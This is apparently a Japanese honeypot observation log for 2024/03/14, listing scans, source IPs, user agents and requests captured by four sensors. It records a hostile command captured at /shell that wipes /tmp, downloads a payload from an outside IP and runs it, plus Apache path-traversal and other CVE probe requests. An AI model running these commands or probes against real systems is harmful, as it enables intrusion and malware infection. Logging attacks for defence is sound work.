2024/03/14 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/03/14分です。

特徴

共通

CensysInspectによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

curlによるスキャン行為
/.gitへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 193.23.161.113/jaws;
sh /tmp/jaws

Location:US

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
/.gitへのスキャン行為

を確認しました。

Location:UK

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
Telerik UIの脆弱性(CVE-2019-18935)を狙うアクセス
curlによるスキャン行為

を確認しました。

Location:SG

Spring Bootの脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
curlによるスキャン行為
/.gitへのスキャン行為
165.232.135.20に関する不正通信

を確認しました。

他

アクセス数推移

JP：総アクセス数：328 (前日比：211)
US：総アクセス数：79 (前日比：-2)
UK：総アクセス数：103 (前日比：-148)
SG：総アクセス数：102 (前日比：-260)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
127	1.13.8.48	China
2	5.167.104.84	Russia
1	20.162.99.130	United States
1	45.56.108.128	United States
1	64.62.197.157	United States
1	66.175.213.4	United States
2	68.183.193.242	United States
1	91.92.245.67	Bulgaria
4	91.92.245.159	Bulgaria
9	101.32.192.203	Singapore
1	103.205.127.162	India
1	104.192.0.61	United States
1	104.248.249.33	United States
1	106.3.128.66	China
4	135.125.217.54	France
10	135.125.244.48	France
1	138.68.184.205	United States
1	167.248.133.186	United States
13	170.64.195.193	United States
1	170.130.187.2	United States
1	172.104.11.4	United States
1	176.119.25.150	Ukraine
3	184.105.139.68	United States
1	185.91.127.197	United Kingdom
1	185.150.26.251	Netherlands
8	185.254.196.173	Ukraine
127	196.189.44.4	Ethiopia
1	198.199.114.97	United States
2	205.210.31.29	United States

UserAgent一覧

件数	UserAgent
10	`-`
3	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
254	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`curl/8.1.2`
1	`https[:]//gdnplus[.]com:Gather Analyze Provide.`
5	`python-requests/2.28.2`
2	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\xfa\x01`
8		`\x16\x03\x01`
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
2	GET	`/1phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/2phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/MyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/PMA/index.php?lang=en`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
2	GET	`/__phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/_phpmyadmin_/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/db/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/sqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/sysadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/admin/web/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/PMA/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/admin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/db/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/administrator/web/index.php?lang=en`	HTTP/1.1
2	GET	`/api/v3/time`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
2	GET	`/database/index.php?lang=en`	HTTP/1.1
2	GET	`/db/db-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/dbadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/dbweb/index.php?lang=en`	HTTP/1.1
2	GET	`/db/index.php?lang=en`	HTTP/1.1
2	GET	`/db/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpmyadmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpmyadmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/db/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/db/webadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/db/webdb/index.php?lang=en`	HTTP/1.1
2	GET	`/db/websql/index.php?lang=en`	HTTP/1.1
2	GET	`/dbadmin/index.php?lang=en`	HTTP/1.1
3	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
2	GET	`/index.php?lang=en`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
2	GET	`/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/admin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/db/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/dbadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/mysqlmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/pMA/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/sqlmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/mysql/web/index.php?lang=en`	HTTP/1.1
2	GET	`/mysqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/mysqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
2	GET	`/php-my-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/php-myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-4.9.10-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-4.9.7/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-4/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.1.3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.0-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.1-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.1-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2.1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5.2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-latest-all-languages/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-latest-english/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin-latest/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin5.1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin5.2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin6.0/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin6/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyAdmin_/index.php?lang=en`	HTTP/1.1
2	GET	`/phpMyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmy-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmy/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin1/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2017/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2018/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2019/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2020/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2021/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin2022/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin6/index.php?lang=en`	HTTP/1.1
2	GET	`/phpmyadmin_/index.php?lang=en`	HTTP/1.1
2	GET	`/phppma/index.php?lang=en`	HTTP/1.1
2	GET	`/pma/index.php?lang=en`	HTTP/1.1
2	GET	`/program/index.php?lang=en`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+193[.]23[.]161[.]113/jaws;sh+/tmp/jaws`	HTTP/1.1
2	GET	`/shopdb/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/php-myadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpMyAdmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpMyAdmin2/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmanager/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmy-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmyadmin3/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmyadmin4/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/phpmyadmin5/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sql-admin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sql/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sqladmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/sqlweb/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/webadmin/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/webdb/index.php?lang=en`	HTTP/1.1
2	GET	`/sql/websql/index.php?lang=en`	HTTP/1.1
2	GET	`/sqlmanager/index.php?lang=en`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en`	HTTP/1.1
1	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	HEAD	`/.env`	HTTP/1.1
9	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.137.106.178	Singapore
1	18.116.72.103	United States
1	20.199.41.41	United States
2	45.79.128.205	United States
2	54.36.115.221	France
8	57.129.23.166	France
3	74.82.47.5	United States
2	78.153.140.177	Russia
1	80.66.88.215	Russia
1	83.97.73.245	Germany
1	87.121.69.25	Bulgaria
1	91.92.244.152	Bulgaria
1	91.92.255.41	Bulgaria
7	95.214.235.169	Ukraine
2	102.219.33.86	Ghana
1	138.197.0.209	United States
1	139.59.101.104	Singapore
2	143.198.61.223	United States
1	147.45.45.0	Russia
1	165.227.225.59	United States
2	167.94.145.53	United States
2	167.248.133.52	United States
2	167.248.133.125	United States
1	172.104.11.4	United States
1	180.149.125.166	Mongolia
1	184.105.247.252	United States
1	185.161.248.148	United Kingdom
20	185.180.143.140	Portugal
1	188.215.235.99	Romania
1	198.199.104.85	United States
1	198.199.106.131	United States
2	198.235.24.151	United States
2	205.210.31.8	United States
2	205.210.31.132	United States

UserAgent一覧

件数	UserAgent
20	`-`
2	`Go-http-client/1.1`
1	`Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G965W Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.84 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
22	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\xfb\x01`
11		`\x16\x03\x01`
1	CONNECT	`google[.]com:443`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api/session/properties`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cluster/cluster/`	HTTP/1.1
1	GET	`/favicon-32x32.png`	HTTP/1.1
7	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/identity`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/sitecore/shell/sitecore.version.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/static/historypage.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
3	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	42.240.136.92	China
1	45.79.128.205	United States
1	45.79.181.251	United States
8	54.37.79.75	France
12	57.129.23.166	France
2	62.210.90.216	France
1	65.49.1.52	United States
2	65.49.1.57	United States
1	65.49.1.76	United States
1	66.175.213.4	United States
2	78.153.140.177	Russia
2	83.97.73.245	Germany
1	85.90.246.159	United States
1	91.92.244.152	Bulgaria
9	95.214.235.169	Ukraine
1	104.206.128.62	United States
20	107.151.182.58	United States
1	107.170.246.16	United States
1	139.59.101.104	Singapore
2	146.190.166.168	United States
6	152.32.173.15	Hong Kong
4	152.32.243.98	Hong Kong
1	159.203.224.22	United States
4	164.52.0.94	China
2	165.154.129.151	Hong Kong
2	167.94.145.60	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.51	United States
1	180.149.125.166	Mongolia
1	185.150.26.251	Netherlands
1	185.161.248.148	United Kingdom
1	188.215.235.99	Romania
1	192.155.90.220	United States
1	192.241.227.61	United States
2	198.235.24.155	United States
2	198.235.24.239	United States
1	206.189.113.157	United States

UserAgent一覧

件数	UserAgent
23	`-`
6	`Go-http-client/1.1`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
30	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`curl/7.81.0`
1	`https[:]//gdnplus[.]com:Gather Analyze Provide.`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
1		`\x03`
1		`\x16\x03\x01\x01H\x01`
1		`\x16\x03\x01\x01\x17\x01`
1		`\x16\x03\x01\x01\xfc\x01`
2		`\x16\x03\x01\x02`
14		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
31	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Telerik.Web.UI.WebResource.axd?type=rau`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/`	HTTP/1.1
1	GET	`/api/session/properties`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cf_scripts/scripts/ajax/ckeditor/ckeditor.js`	HTTP/1.1
1	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
1	GET	`/favicon-32x32.png`	HTTP/1.1
9	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/identity`	HTTP/1.1
1	GET	`/index.jsp`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
2	GET	`/robots.txt`	HTTP/1.1
1	GET	`/showLogin.cc`	HTTP/1.1
1	GET	`/sitecore/shell/sitecore.version.xml`	HTTP/1.1
2	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/static/historypage.js`	HTTP/1.1
1	GET	`/sugar_version.json`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`http[:]//httpbin[.]org/ip`	HTTP/1.1
1	HEAD	`/`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png`	HTTP/1.1
1	HEAD	`/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/.%2e/%2e%2e/apache2/icons/sphere1.png`	HTTP/1.1
1	HEAD	`/icons/sphere1.png`	HTTP/1.1
1	PRI	`*`	HTTP/2.0
1	t3	`12.1.2\n`

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	4.227.191.150	United States
2	5.8.10.202	Russia
1	15.204.25.7	United States
1	42.240.136.121	China
1	45.56.108.128	United States
16	54.37.79.75	France
1	64.62.197.151	United States
3	65.49.20.68	United States
1	68.183.196.48	United States
2	78.153.140.177	Russia
2	83.97.73.245	Germany
1	91.92.244.152	Bulgaria
1	91.92.246.41	Bulgaria
1	91.92.255.41	Bulgaria
8	95.214.235.169	Ukraine
2	101.36.108.133	Hong Kong
1	104.140.188.6	United States
1	107.170.208.28	United States
1	138.197.0.209	United States
2	138.197.24.249	United States
2	143.198.61.223	United States
1	147.45.45.0	Russia
6	148.153.45.238	United States
1	152.89.198.224	Russia
1	164.90.158.74	United States
6	165.154.118.9	Hong Kong
13	167.71.144.214	United States
2	167.94.138.36	United States
1	172.104.11.4	United States
1	172.105.128.11	United States
1	180.149.125.167	Mongolia
1	185.150.26.251	Netherlands
1	185.161.248.148	United Kingdom
1	188.215.235.99	Romania
1	192.155.90.118	United States
2	192.155.90.220	United States
1	192.241.201.30	United States
1	192.241.201.31	United States
1	192.241.204.48	United States
1	192.241.221.43	United States
1	193.203.203.180	Moldova
2	198.235.24.57	United States
2	205.210.31.25	United States
2	205.210.31.130	United States
1	223.199.191.169	China

UserAgent一覧

件数	UserAgent
24	`-`
9	`Go-http-client/1.1`
1	`Mozilla/0 (Project 25499 Scanner)`
1	`Mozilla/5.0 (Linux; Android 8.0.0; Lenovo K8 Note) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Linux; U; Android 9; en-gb; Redmi Note 7 Pro Build/PKQ1.181203.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/10.9.8-g`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
6	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
